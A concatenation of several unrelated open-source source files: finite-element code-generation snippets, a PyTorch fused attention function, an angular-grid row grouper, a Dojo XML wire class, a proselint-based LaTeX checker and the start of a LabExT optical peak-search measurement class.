%%(transform)s[row][col] *= %%(K)s[%%(combinations)s%(t)s[col][k]][%%(combinations)s%(g)s[row][k]];
}
}""" % {"t": _t, "g": _g}
return snippet
# Codesnippets used in evaluate_dof
_map_onto_physical_1D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0];
const double w1 = X_%(i)d[%(j)s][0];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[1];"""
_map_onto_physical_2D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0] - X_%(i)d[%(j)s][1];
const double w1 = X_%(i)d[%(j)s][0];
const double w2 = X_%(i)d[%(j)s][1];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[2] + w2*coordinate_dofs[4];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[3] + w2*coordinate_dofs[5];"""
_map_onto_physical_2D_1D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0];
const double w1 = X_%(i)d[%(j)s][0];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[2];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[3];"""
_map_onto_physical_3D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0] - X_%(i)d[%(j)s][1] - X_%(i)d[%(j)s][2];
const double w1 = X_%(i)d[%(j)s][0];
const double w2 = X_%(i)d[%(j)s][1];
const double w3 = X_%(i)d[%(j)s][2];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[3] + w2*coordinate_dofs[6] + w3*coordinate_dofs[9];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[4] + w2*coordinate_dofs[7] + w3*coordinate_dofs[10];
y[2] = w0*coordinate_dofs[2] + w1*coordinate_dofs[5] + w2*coordinate_dofs[8] + w3*coordinate_dofs[11];"""
_map_onto_physical_3D_1D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0];
const double w1 = X_%(i)d[%(j)s][0];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[3];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[4];
y[2] = w0*coordinate_dofs[2] + w1*coordinate_dofs[5];"""
_map_onto_physical_3D_2D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0] - X_%(i)d[%(j)s][1];
const double w1 = X_%(i)d[%(j)s][0];
const double w2 = X_%(i)d[%(j)s][1];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[3] + w2*coordinate_dofs[6];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[4] + w2*coordinate_dofs[7];
y[2] = w0*coordinate_dofs[2] + w1*coordinate_dofs[5] + w2*coordinate_dofs[8];
"""
_ip_coordinates_1D = """\
X%(num_ip)d[0] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[1];"""
_ip_coordinates_2D_1D = """\
X%(num_ip)d[0] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[2];
X%(num_ip)d[1] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3];"""
_ip_coordinates_3D_1D = """\
X%(num_ip)d[0] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3];
X%(num_ip)d[1] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[4];
X%(num_ip)d[2] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[2] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[5];"""
_ip_coordinates_2D = """\
X%(num_ip)d[0] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[2] + %(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[4];
X%(num_ip)d[1] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3] + %(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[5];"""
_ip_coordinates_3D_2D = """\
X%(num_ip)d[0] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3] +\
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[6];
X%(num_ip)d[1] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[4] +\
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[7];
X%(num_ip)d[2] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[2] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[5] +\
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[8];"""
_ip_coordinates_3D = """\
X%(num_ip)d[0] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3] + \
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[6] + \
%(name)s[%(ip)s][3]*coordinate_dofs%(restriction)s[9];
X%(num_ip)d[1] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[4] + \
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[7] + \
%(name)s[%(ip)s][3]*coordinate_dofs%(restriction)s[10];
X%(num_ip)d[2] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[2] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[5] + \
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[8] + \
%(name)s[%(ip)s][3]*coordinate_dofs%(restriction)s[11];"""
# Codesnippets used in evaluatebasis[|derivatives]
_map_coordinates_FIAT_interval = """\
// Get coordinates and map to the reference (FIAT) element
double X = (2.0*x[0] - coordinate_dofs[0] - coordinate_dofs[1]) / J[0];"""
_map_coordinates_FIAT_interval_in_2D = """\
// Get coordinates and map to the reference (FIAT) element
double X = 2*(std::sqrt(std::pow(x[0] - coordinate_dofs[0], 2) + std::pow(x[1] - coordinate_dofs[1], 2)) / detJ) - 1.0;"""
_map_coordinates_FIAT_interval_in_3D = """\
// Get coordinates and map to the reference (FIAT) element
double X = 2*(std::sqrt(std::pow(x[0] - coordinate_dofs[0], 2) + std::pow(x[1] - coordinate_dofs[1], 2) + std::pow(x[2] - coordinate_dofs[2], 2))/ detJ) - 1.0;"""
_map_coordinates_FIAT_triangle = """\
// Compute constants
const double C0 = coordinate_dofs[2] + coordinate_dofs[4];
const double C1 = coordinate_dofs[3] + coordinate_dofs[5];
// Get coordinates and map to the reference (FIAT) element
double X = (J[1]*(C1 - 2.0*x[1]) + J[3]*(2.0*x[0] - C0)) / detJ;
double Y = (J[0]*(2.0*x[1] - C1) + J[2]*(C0 - 2.0*x[0])) / detJ;"""
_map_coordinates_FIAT_triangle_in_3D = """\
const double b0 = coordinate_dofs[0];
const double b1 = coordinate_dofs[1];
const double b2 = coordinate_dofs[2];
// P_FFC = J^dag (p - b), P_FIAT = 2*P_FFC - (1, 1)
double X = 2*(K[0]*(x[0] - b0) + K[1]*(x[1] - b1) + K[2]*(x[2] - b2)) - 1.0;
double Y = 2*(K[3]*(x[0] - b0) + K[4]*(x[1] - b1) + K[5]*(x[2] - b2)) - 1.0;
"""
_map_coordinates_FIAT_tetrahedron = """\
// Compute constants
const double C0 = coordinate_dofs[9] + coordinate_dofs[6] + coordinate_dofs[3] - coordinate_dofs[0];
const double C1 = coordinate_dofs[10] + coordinate_dofs[7] + coordinate_dofs[4] - coordinate_dofs[1];
const double C2 = coordinate_dofs[11] + coordinate_dofs[8] + coordinate_dofs[5] - coordinate_dofs[2];
// Compute subdeterminants
const double d_00 = J[4]*J[8] - J[5]*J[7];
const double d_01 = J[5]*J[6] - J[3]*J[8];
const double d_02 = J[3]*J[7] - J[4]*J[6];
const double d_10 = J[2]*J[7] - J[1]*J[8];
const double d_11 = J[0]*J[8] - J[2]*J[6];
const double d_12 = J[1]*J[6] - J[0]*J[7];
const double d_20 = J[1]*J[5] - J[2]*J[4];
const double d_21 = J[2]*J[3] - J[0]*J[5];
const double d_22 = J[0]*J[4] - J[1]*J[3];
// Get coordinates and map to the reference (FIAT) element
double X = (d_00*(2.0*x[0] - C0) + d_10*(2.0*x[1] - C1) + d_20*(2.0*x[2] - C2)) / detJ;
double Y = (d_01*(2.0*x[0] - C0) + d_11*(2.0*x[1] - C1) + d_21*(2.0*x[2] - C2)) / detJ;
double Z = (d_02*(2.0*x[0] - C0) + d_12*(2.0*x[1] - C1) + d_22*(2.0*x[2] - C2)) / detJ;
"""
# Mappings to code snippets used by format These dictionaries accept
# as keys: first the topological dimension, and second the geometric
# dimension
facet_determinant = {1: {1: _facet_determinant_1D,
2: _facet_determinant_2D_1D,
3: _facet_determinant_3D_1D},
2: {2: _facet_determinant_2D,
3: _facet_determinant_3D_2D},
3: {3: _facet_determinant_3D}}
# Geometry related snippets
map_onto_physical = {1: {1: _map_onto_physical_1D,
2: _map_onto_physical_2D_1D,
3: _map_onto_physical_3D_1D},
2: {2: _map_onto_physical_2D,
3: _map_onto_physical_3D_2D},
3: {3: _map_onto_physical_3D}}
fiat_coordinate_map = {"interval": {1: _map_coordinates_FIAT_interval,
2: _map_coordinates_FIAT_interval_in_2D,
3: _map_coordinates_FIAT_interval_in_3D},
"triangle": {2: _map_coordinates_FIAT_triangle,
3: _map_coordinates_FIAT_triangle_in_3D},
"tetrahedron": {3: _map_coordinates_FIAT_tetrahedron}}
transform_snippet = {"interval": {1: _transform_snippet(1, 1),
2: _transform_snippet(1, 2),
3: _transform_snippet(1, 3)},
"triangle": {2: _transform_snippet(2, 2),
3: _transform_snippet(2, 3)},
"tetrahedron": {3: _transform_snippet(3, 3)}}
ip_coordinates = {1: {1: (3, _ip_coordinates_1D),
2: (6, _ip_coordinates_2D_1D),
3: (9, _ip_coordinates_3D_1D)},
2: {2: (10, _ip_coordinates_2D),
3: (15, _ip_coordinates_3D_2D)},
3: {3: (21, _ip_coordinates_3D)}}
# FIXME: Rename as in compute_jacobian _compute_foo_<shape>_<n>d
normal_direction = {1: {1: _normal_direction_1D,
2: _normal_direction_2D_1D,
3: _normal_direction_3D_1D},
2: {2: _normal_direction_2D,
3: _normal_direction_3D_2D},
3: {3: _normal_direction_3D}}
facet_normal = {1: {1: _facet_normal_1D,
2: _facet_normal_2D_1D,
3: _facet_normal_3D_1D},
2: {2: _facet_normal_2D,
3: _facet_normal_3D_2D},
3: {3: _facet_normal_3D}}
cell_volume = {1: {1: _cell_volume_1D,
2: _cell_volume_2D_1D,
3: _cell_volume_3D_1D},
2: {2: _cell_volume_2D,
3: _cell_volume_3D_2D},
3: {3: _cell_volume_3D}}
circumradius = {1: {1: _circumradius_1D,
2: _circumradius_2D_1D,
3: _circumradius_3D_1D},
2: {2: _circumradius_2D,
3: _circumradius_3D_2D},
3: {3: _circumradius_3D}}
facet_area = {1: {1: _facet_area_1D,
2: _facet_area_2D_1D,
3: _facet_area_3D_1D},
2: {2: _facet_area_2D,
3: _facet_area_3D_2D},
3: {3: _facet_area_3D}}
min_facet_edge_length = {3: {3: _min_facet_edge_length_3D}}
max_facet_edge_length = {3: {3: _max_facet_edge_length_3D}}
# Code snippets for runtime quadrature (calling evaluate_basis)
eval_basis_decl = """\
std::vector<std::vector<double> > %(table_name)s(num_quadrature_points);"""
eval_basis_init = """\
for (std::size_t ip = 0; ip < num_quadrature_points; ip++)
%(table_name)s[ip].resize(%(table_size)s);"""
eval_basis = """\
// Get current quadrature point and compute values of basis functions
const double* x = quadrature_points + ip*%(gdim)s;
const double* v = coordinate_dofs + %(vertex_offset)s;
%(classname)s::_evaluate_basis_all(%(eval_name)s, x, v, cell_orientation);"""
eval_basis_copy = """\
// Copy values to table %(table_name)s
for (std::size_t i = 0; i < %(space_dim)s; i++)
%(table_name)s[ip][%(table_offset)s + i] = %(eval_name)s[%(eval_stride)s*i + %(eval_offset)s];"""
eval_derivs_decl = """\
std::vector<std::vector<double> > %(table_name)s(num_quadrature_points);"""
eval_derivs_init = """\
for (std::size_t ip = 0; ip < num_quadrature_points; ip++)
%(table_name)s[ip].resize(%(table_size)s);"""
eval_derivs = """\
// Get current quadrature point and compute values of basis function derivatives
const double* x = quadrature_points + ip*%(gdim)s;
const double* v = coordinate_dofs + %(vertex_offset)s;
%(classname)s::_evaluate_basis_derivatives_all(%(n)s, %(eval_name)s, x, v, cell_orientation);"""
eval_derivs_copy = """\
// Copy values to table %(table_name)s
for (std::size_t i = 0; i < %(space_dim)s; i++)
%(table_name)s[ip][%(table_offset)s + i] = %(eval_name)s[%(eval_stride)s*i + %(eval_offset)s];""" | PypiClean |
/CsuPTMD-1.0.12.tar.gz/CsuPTMD-1.0.12/PTMD/maskrcnn_benchmark/apex/apex/contrib/multihead_attn/fast_self_multihead_attn_func.py | import torch
import fast_self_multihead_attn
import fast_self_multihead_attn_bias
import fast_self_multihead_attn_bias_additive_mask
class FastSelfAttnFunc(torch.autograd.Function) :
@staticmethod
def forward(ctx, use_time_mask, is_training, heads, inputs, input_weights, output_weights, input_biases, output_biases, pad_mask, mask_additive, dropout_prob):
use_biases_t = torch.tensor([input_biases is not None])
heads_t = torch.tensor([heads])
dropout_prob_t = torch.tensor([dropout_prob])
null_tensor = torch.tensor([])
use_mask = (pad_mask is not None)
if use_biases_t[0]:
if not mask_additive:
input_lin_results, \
softmax_results, \
dropout_results, \
dropout_mask, \
matmul2_results, \
outputs = \
fast_self_multihead_attn_bias.forward( \
use_mask, \
use_time_mask, \
is_training, \
heads, \
inputs, \
input_weights, \
output_weights, \
input_biases, \
output_biases, \
pad_mask if use_mask else null_tensor, \
dropout_prob)
else:
input_lin_results, \
softmax_results, \
dropout_results, \
dropout_mask, \
matmul2_results, \
outputs = \
fast_self_multihead_attn_bias_additive_mask.forward( \
use_mask, \
use_time_mask, \
is_training, \
heads, \
inputs, \
input_weights, \
output_weights, \
input_biases, \
output_biases, \
pad_mask if use_mask else null_tensor, \
dropout_prob)
else:
input_lin_results, \
softmax_results, \
dropout_results, \
dropout_mask, \
matmul2_results, \
outputs = \
fast_self_multihead_attn.forward( \
use_mask, \
use_time_mask, \
is_training, \
heads, \
inputs, \
input_weights, \
output_weights, \
pad_mask if use_mask else null_tensor, \
dropout_prob)
ctx.save_for_backward(use_biases_t, \
heads_t, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t)
return outputs.detach()
@staticmethod
def backward(ctx, output_grads):
use_biases_t, \
heads_t, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t = ctx.saved_tensors
if use_biases_t[0]:
input_grads, \
input_weight_grads, \
output_weight_grads, \
input_bias_grads, \
output_bias_grads = \
fast_self_multihead_attn_bias.backward( \
heads_t[0], \
output_grads, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t[0])
else:
input_bias_grads = None
output_bias_grads = None
input_grads, \
input_weight_grads, \
output_weight_grads = \
fast_self_multihead_attn.backward( \
heads_t[0], \
output_grads, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t[0])
return None, None, None, input_grads, input_weight_grads, output_weight_grads,input_bias_grads, output_bias_grads, None, None, None
fast_self_attn_func = FastSelfAttnFunc.apply | PypiClean |
/Flask-Scaffold-0.5.1.tar.gz/Flask-Scaffold-0.5.1/app/templates/static/node_modules/angular-grid/src/ts/groupCreator.ts | module awk.grid {
export class GroupCreator {
private valueService: ValueService;
public init(valueService: ValueService) {
this.valueService = valueService;
}
public group(rowNodes: RowNode[], groupedCols: Column[], expandByDefault: any) {
var topMostGroup: RowNode = {
level: -1,
children: [],
_childrenMap: {}
};
var allGroups: RowNode[] = [];
allGroups.push(topMostGroup);
var levelToInsertChild = groupedCols.length - 1;
var i: number;
var currentLevel: number;
var node: RowNode;
var data: any;
var currentGroup: any;
var groupKey: string;
var nextGroup: RowNode;
// start at -1 and go backwards, as all the positive indexes
// are already used by the nodes.
var index = -1;
for (i = 0; i < rowNodes.length; i++) {
node = rowNodes[i];
data = node.data;
// all leaf nodes have the same level in this grouping, which is one level after the last group
node.level = levelToInsertChild + 1;
for (currentLevel = 0; currentLevel < groupedCols.length; currentLevel++) {
var groupColumn = groupedCols[currentLevel];
groupKey = this.valueService.getValue(groupColumn.colDef, data, node);
if (currentLevel === 0) {
currentGroup = topMostGroup;
}
// if group doesn't exist yet, create it
nextGroup = currentGroup._childrenMap[groupKey];
if (!nextGroup) {
nextGroup = {
group: true,
field: groupColumn.colId,
id: index--,
key: groupKey,
expanded: this.isExpanded(expandByDefault, currentLevel),
children: [],
// for top most level, parent is null
parent: currentGroup === topMostGroup ? null : currentGroup,
allChildrenCount: 0,
level: currentGroup.level + 1,
_childrenMap: {} //this is a temporary map, we remove at the end of this method
};
currentGroup._childrenMap[groupKey] = nextGroup;
currentGroup.children.push(nextGroup);
allGroups.push(nextGroup);
}
nextGroup.allChildrenCount++;
if (currentLevel == levelToInsertChild) {
node.parent = nextGroup === topMostGroup ? null : nextGroup;
nextGroup.children.push(node);
} else {
currentGroup = nextGroup;
}
}
}
``
//remove the temporary map
for (i = 0; i < allGroups.length; i++) {
delete allGroups[i]._childrenMap;
}
return topMostGroup.children;
}
isExpanded(expandByDefault: any, level: any) {
if (typeof expandByDefault === 'number') {
return level < expandByDefault;
} else {
return expandByDefault === true || expandByDefault === 'true';
}
}
}
} | PypiClean |
/FreePyBX-1.0-RC1.tar.gz/FreePyBX-1.0-RC1/freepybx/public/js/dojox/wire/XmlWire.js.uncompressed.js | define("dojox/wire/XmlWire", ["dijit","dojo","dojox","dojo/require!dojox/xml/parser,dojox/wire/Wire"], function(dijit,dojo,dojox){
dojo.provide("dojox.wire.XmlWire");
dojo.require("dojox.xml.parser");
dojo.require("dojox.wire.Wire");
dojo.declare("dojox.wire.XmlWire", dojox.wire.Wire, {
// summary:
// A Wire for XML nodes or values (element, attribute and text)
// description:
// This class accesses XML nodes or value with a simplified XPath
// specified to 'path' property.
// The root object for this class must be an DOM document or element
// node.
// "@name" accesses to an attribute value of an element and "text()"
// accesses to a text value of an element.
// The hierarchy of the elements from the root node can be specified
// with slash-separated list, such as "a/b/@c", which specifies
// the value of an attribute named "c" of an element named "b" as
// a child of another element named "a" of a child of the root node.
_wireClass: "dojox.wire.XmlWire",
constructor: function(/*Object*/args){
// summary:
// Initialize properties
// description:
// 'args' is just mixed in with no further processing.
// args:
// Arguments to initialize properties
// path:
// A simplified XPath to an attribute, a text or elements
},
_getValue: function(/*Node*/object){
// summary:
// Return an attribute value, a text value or an array of elements
// description:
// This method first uses a root node passed in 'object' argument
// and 'path' property to identify an attribute, a text or
// elements.
// If 'path' starts with a slash (absolute), the first path
// segment is ignored assuming it point to the root node.
// (That is, "/a/b/@c" and "b/@c" against a root node access
// the same attribute value, assuming the root node is an element
// with a tag name, "a".)
// object:
// A root node
// returns:
// A value found, otherwise 'undefined'
if(!object || !this.path){
return object; //Node
}
var node = object;
var path = this.path;
var i;
if(path.charAt(0) == '/'){ // absolute
// skip the first expression (supposed to select the top node)
i = path.indexOf('/', 1);
path = path.substring(i + 1);
}
var list = path.split('/');
var last = list.length - 1;
for(i = 0; i < last; i++){
node = this._getChildNode(node, list[i]);
if(!node){
return undefined; //undefined
}
}
var value = this._getNodeValue(node, list[last]);
return value; //String||Array
},
_setValue: function(/*Node*/object, /*String*/value){
// summary:
// Set an attribute value or a child text value to an element
// description:
// This method first uses a root node passed in 'object' argument
// and 'path' property to identify an attribute, a text or
// elements.
// If an intermediate element does not exist, it creates
// an element of the tag name in the 'path' segment as a child
// node of the current node.
// Finally, 'value' argument is set to an attribute or a text
// (a child node) of the leaf element.
// object:
// A root node
// value:
// A value to set
if(!this.path){
return object; //Node
}
var node = object;
var doc = this._getDocument(node);
var path = this.path;
var i;
if(path.charAt(0) == '/'){ // absolute
i = path.indexOf('/', 1);
if(!node){
var name = path.substring(1, i);
node = doc.createElement(name);
object = node; // to be returned as a new object
}
// skip the first expression (supposed to select the top node)
path = path.substring(i + 1);
}else{
if(!node){
return undefined; //undefined
}
}
var list = path.split('/');
var last = list.length - 1;
for(i = 0; i < last; i++){
var child = this._getChildNode(node, list[i]);
if(!child){
child = doc.createElement(list[i]);
node.appendChild(child);
}
node = child;
}
this._setNodeValue(node, list[last], value);
return object; //Node
},
_getNodeValue: function(/*Node*/node, /*String*/exp){
// summary:
// Return an attribute value, a text value or an array of elements
// description:
// If 'exp' starts with '@', an attribute value of the specified
// attribute is returned.
// If 'exp' is "text()", a child text value is returned.
// Otherwise, an array of child elements, the tag name of which
// match 'exp', is returned.
// node:
// A node
// exp:
// An expression for attribute, text or elements
// returns:
// A value found, otherwise 'undefined'
var value = undefined;
if(exp.charAt(0) == '@'){
var attribute = exp.substring(1);
value = node.getAttribute(attribute);
}else if(exp == "text()"){
var text = node.firstChild;
if(text){
value = text.nodeValue;
}
}else{ // assume elements
value = [];
for(var i = 0; i < node.childNodes.length; i++){
var child = node.childNodes[i];
if(child.nodeType === 1 /* ELEMENT_NODE */ && child.nodeName == exp){
value.push(child);
}
}
}
return value; //String||Array
},
_setNodeValue: function(/*Node*/node, /*String*/exp, /*String*/value){
// summary:
// Set an attribute value or a child text value to an element
// description:
// If 'exp' starts with '@', 'value' is set to the specified
// attribute.
// If 'exp' is "text()", 'value' is set to a child text.
// node:
// A node
// exp:
// An expression for attribute or text
// value:
// A value to set
if(exp.charAt(0) == '@'){
var attribute = exp.substring(1);
if(value){
node.setAttribute(attribute, value);
}else{
node.removeAttribute(attribute);
}
}else if(exp == "text()"){
while(node.firstChild){
node.removeChild(node.firstChild);
}
if(value){
var text = this._getDocument(node).createTextNode(value);
node.appendChild(text);
}
}
// else not supported
},
_getChildNode: function(/*Node*/node, /*String*/name){
// summary:
// Return a child node
// description:
// A child element of the tag name specified with 'name' is
// returned.
// If 'name' ends with an array index, it is used to pick up
// the corresponding element from multiple child elements.
// node:
// A parent node
// name:
// A tag name
// returns:
// A child node
var index = 1;
var i1 = name.indexOf('[');
if(i1 >= 0){
var i2 = name.indexOf(']');
index = name.substring(i1 + 1, i2);
name = name.substring(0, i1);
}
var count = 1;
for(var i = 0; i < node.childNodes.length; i++){
var child = node.childNodes[i];
if(child.nodeType === 1 /* ELEMENT_NODE */ && child.nodeName == name){
if(count == index){
return child; //Node
}
count++;
}
}
return null; //null
},
_getDocument: function(/*Node*/node){
// summary:
// Return a DOM document
// description:
// If 'node' is specified, a DOM document of the node is returned.
// Otherwise, a DOM document is created.
// returns:
// A DOM document
if(node){
return (node.nodeType == 9 /* DOCUMENT_NODE */ ? node : node.ownerDocument); //Document
}else{
return dojox.xml.parser.parse(); //Document
}
}
});
}); | PypiClean |
/CheckMyTex-0.10.5.tar.gz/CheckMyTex-0.10.5/checkmytex/finding/proselint.py | import typing
import proselint.tools
from checkmytex.latex_document import LatexDocument
from .abstract_checker import Checker
from .problem import Problem
_proselint_config = {
"max_errors": 5000,
"checks": {
"airlinese.misc": True,
"annotations.misc": True,
"archaism.misc": True,
"cliches.hell": True,
"cliches.misc": True,
"consistency.spacing": False, # LaTeX does not care about spacing.
"consistency.spelling": True,
"corporate_speak.misc": True,
"cursing.filth": True,
"cursing.nfl": False,
"cursing.nword": True,
"dates_times.am_pm": True,
"dates_times.dates": True,
"hedging.misc": True,
"hyperbole.misc": True,
"jargon.misc": True,
"lexical_illusions.misc": True,
"lgbtq.offensive_terms": True,
"lgbtq.terms": True,
"links.broken": False,
"malapropisms.misc": True,
"misc.apologizing": True,
"misc.back_formations": True,
"misc.bureaucratese": True,
"misc.but": True,
"misc.capitalization": True,
"misc.chatspeak": True,
"misc.commercialese": True,
"misc.composition": True,
"misc.currency": True,
"misc.debased": True,
"misc.false_plurals": True,
"misc.illogic": True,
"misc.inferior_superior": True,
"misc.institution_name": True,
"misc.latin": True,
"misc.many_a": True,
"misc.metaconcepts": True,
"misc.metadiscourse": True,
"misc.narcissism": True,
"misc.not_guilty": True,
"misc.phrasal_adjectives": True,
"misc.preferred_forms": True,
"misc.pretension": True,
"misc.professions": True,
"misc.punctuation": True,
"misc.scare_quotes": True,
"misc.suddenly": True,
"misc.tense_present": True,
"misc.waxed": True,
"misc.whence": True,
"mixed_metaphors.misc": True,
"mondegreens.misc": True,
"needless_variants.misc": True,
"nonwords.misc": True,
"oxymorons.misc": True,
"psychology.misc": True,
"redundancy.misc": True,
"redundancy.ras_syndrome": True,
"skunked_terms.misc": True,
"spelling.able_atable": True,
"spelling.able_ible": True,
"spelling.athletes": True,
"spelling.em_im_en_in": True,
"spelling.er_or": True,
"spelling.in_un": True,
"spelling.misc": True,
"security.credit_card": True,
"security.password": True,
"sexism.misc": True,
"terms.animal_adjectives": True,
"terms.denizen_labels": True,
"terms.eponymous_adjectives": True,
"terms.venery": True,
"typography.diacritical_marks": True,
"typography.exclamation": True,
"typography.symbols": True,
"uncomparables.misc": True,
"weasel_words.misc": True,
"weasel_words.very": True,
},
}
class Proselint(Checker):
def check(self, document: LatexDocument) -> typing.Iterable[Problem]:
self.log("Running proselint...")
text = document.get_text()
suggestions = proselint.tools.lint(text, config=_proselint_config)
for suggestion in suggestions:
rule = suggestion[0]
message = suggestion[1]
origin = document.get_simplified_origin_of_text(
suggestion[4], suggestion[4] + suggestion[6]
)
context = document.get_source_context(origin)
severity = suggestion[7]
replacements = suggestion[8]
yield Problem(
origin,
f"{severity}: {message} Suggestion: {replacements}",
context=context,
long_id=f"{rule}: {context}",
rule=rule,
tool="Proselint",
)
def is_available(self) -> bool:
return True | PypiClean |
/LabExT_pkg-2.2.0.tar.gz/LabExT_pkg-2.2.0/LabExT/SearchForPeak/PeakSearcher.py | import json
import logging
import os
import time
from typing import Type
import numpy as np
from scipy.optimize import curve_fit
from LabExT.Measurements.MeasAPI import *
from LabExT.Movement.MotorProfiles import trapezoidal_velocity_profile_by_integration
from LabExT.Movement.MoverNew import MoverNew
from LabExT.Movement.config import CoordinateSystem
from LabExT.Movement.Transformations import StageCoordinate
from LabExT.Utils import get_configuration_file_path
from LabExT.View.Controls.PlotControl import PlotData
from LabExT.ViewModel.Utilities.ObservableList import ObservableList
class PeakSearcher(Measurement):
"""
## Search for Peak
Executes a Search for Peak for a standard IL measurement with one or two stages (left and right) and only x and y coordinates.
This Measurement is NOT a 'normal' measurement and should NOT be used in an experiment routine.
#### Details
An optical signal generated at an optical source passes through the DUT and into a power meter. The optical fibers carrying said signal are mounted onto
remotely controllable stages (in our case SmarAct Piezo Stages). In this routine, these stages mechanically sweep over a given range, the insertion loss is measured in regular intervals.
The sweep is conducted in x and y direction separately.
The Search for Peak measurement routine relies on the assumption that around the transmission maximum of a grating coupler, the transmission forms a 2D gaussian (w.r.t x and y position).
Thus after having collected data for each axis, a 1D gaussian is fitted to the data and the stages are moved to the maximum of the gaussian.
There are two types of Search for Peak available:
- **stepped SfP**: suitable for all types of fibers/fiber arrays and all power meter models. The given range is mechanically stepped over, the measurement
stops at each point given by the `search step size` parameter, waits the time given by the `search fiber stabilization time` parameter to let fiber vibrations
dissipate and then records a data point. This type is universally applicable but also very slow.
- **fast SfP**: suitable only for fiber arrays and the Keysight N7744a power meter models. The given range is mechanically continuously sweeped over, the power meter
collects regular data points (amount is given by `Number of points`). Those data points are then related to a physical position taking into account the acceleration
of the stages. This type of Search for Peak is significantly faster than the stepped SfP and provides the user with a massively increased amount of data.
At the moment, this type only works with the Keysight N7744a power meter. Usage with single mode fibers is possible, but untested.
#### Example Setup
```
Laser -in-> DUT -out-> Power Meter
```
The `-xx->` arrows denote where the remotely controllable stages are placed. In the case of a fiber array, `-in->` and `-out->` denote the same stage, as both input and output of the DUT are
included in the fiber array. In the case of two single fibers, `-in->` and `-out->` denote two separate stages.
### Parameters
#### Laser Parameters
- **Laser wavelength**: wavelength of the laser in [nm].
- **Laser power**: power of the laser in [dBm].
#### Power Meter Parameters
- **Power Meter range**: range of the power in [dBm].
#### Stage Parameters
- **Search radius**: Radius arond the current position the algorithm sweeps over in [um].
- **SfP type**: Type of Search for Peak to use. Options are `stepped SfP` and `swept SfP`, see above for more detail.
- **(stepped SfP only) Search step size**: Distance between every data point in [um].
- **(stepped SfP only) Search fiber stabilization time**: Idle time between the stage having reached the target position and the measurement start. Meant to allow fiber oscillations to dissipate.
- **(swept SfP only) Search time**: Time the mechanical movement across the set measurement range should take in [s].
- **(swept SfP only) Number of points**: Number of points to collect at the power meter for each separate sweep.
All parameters labelled `stepped SfP only` are ignored when choosing the swept SfP, all parameters labelled `swept SfP only` are ignored when choosing the stepped SfP.
"""
